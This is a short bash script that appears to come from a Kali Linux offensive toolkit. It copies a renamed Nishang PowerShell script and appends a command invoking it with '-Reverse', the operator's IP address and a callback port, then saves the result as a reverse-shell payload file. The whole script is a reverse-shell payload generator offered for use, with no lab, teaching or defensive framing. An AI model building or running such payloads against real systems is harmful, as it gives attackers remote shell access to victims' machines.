#!/bin/bash
if [ $# -eq 0 ]; then
    echo "Usage: Nishang [callback port]"
    exit 1
fi
IP=$( IP_No_Clip );                      
New_IP=$( echo -n $IP );                                                                                                              
cp /home/kali/Ops/Tools/brwn-shoe-crew-n1shang.ps1 .;
echo "brwn-shoe-crew-n1shang -Reverse -IPAddress $New_IP -Port $1" >> brwn-shoe-crew-n1shang.ps1;
mv brwn-shoe-crew-n1shang.ps1 reverse_$1.ps1
